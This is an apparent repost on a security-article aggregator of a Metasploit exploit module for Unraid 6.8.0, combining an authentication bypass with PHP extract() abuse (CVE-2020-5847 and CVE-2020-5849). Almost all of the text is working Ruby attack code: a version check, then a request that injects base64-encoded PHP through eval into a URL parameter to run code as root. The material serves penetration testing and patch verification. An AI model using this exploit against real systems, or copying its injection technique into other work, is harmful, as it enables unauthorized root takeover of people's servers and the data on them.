HackDig : Dig high-quality web security articles for hackers

Unraid 6.8.0 Authentication Bypass / Arbitrary Code Execution

2020-04-18 16:00
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::PhpEXE  Rank = ExcellentRanking  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Unraid 6.8.0 Auth Bypass PHP Code Execution',        'Description' => %q{          This module exploits two vulnerabilities affecting Unraid 6.8.0.          An authentication bypass is used to gain access to the administrative          interface, and an insecure use of the extract PHP function can be abused          for arbitrary code execution as root.        },        'Author' =>          [            'Nicolas CHATELAIN <n.chatelain@sysdream.com>'          ],        'References' =>          [            [ 'CVE', '2020-5847' ],            [ 'CVE', '2020-5849' ],            [ 'URL', 'https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/' ],            [ 'URL', 'https://forums.unraid.net/topic/88253-critical-security-vulnerabilies-discovered/' ]          ],        'License' => MSF_LICENSE,        'Platform' => ['php'],        'Privileged' => true,        'Arch' => ARCH_PHP,        'Targets' =>          [            [ 'Automatic', {}]          ],        'DefaultTarget' => 0,        'DisclosureDate' => 'Feb 10 2020'      )    )    register_options(      [        OptString.new('TARGETURI', [ true, 'The URI of the Unraid application', '/'])      ]    )  end  def check    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'),      'method' => 'GET'    )    unless res      return CheckCode::Unknown('Connection failed')    end    unless res.code == 200      return CheckCode::Safe('Unexpected reply')    end    /sVersion:s(?<version>[d]{1,2}.[d]{1,2}.[d]{1,2})&nbsp;/ =~ res.body    if version && Gem::Version.new(version) == Gem::Version.new('6.8.0')      return CheckCode::Appears("Unraid version #{version} appears to be vulnerable")    end    CheckCode::Safe  end  def exploit    begin      vprint_status('Sending exploit code')      res = send_request_cgi(        'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'),        'method' => 'GET',        'encode_params' => false,        'vars_get' =>        {          'path' => 'x',          'site[x][text]' => Rex::Text.uri_encode("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", 'hex-normal')        }      )      if res.nil?        print_good('Request timed out, OK if running a non-forking/blocking payload...')      elsif res.code == 302        fail_with(Failure::NotVulnerable, 'Redirected, target is not vulnerable.')      else        print_warning("Unexpected response code #{res.code}, please check your payload.")      end    rescue ::Rex::ConnectionError      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")    end  endend


Source: 6900400202-BLW/eussi/moc.ytirucesxc

Read:680 | Comments:0 | Tags:No Tag

“Unraid 6.8.0 Authentication Bypass / Arbitrary Code Execution”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Tools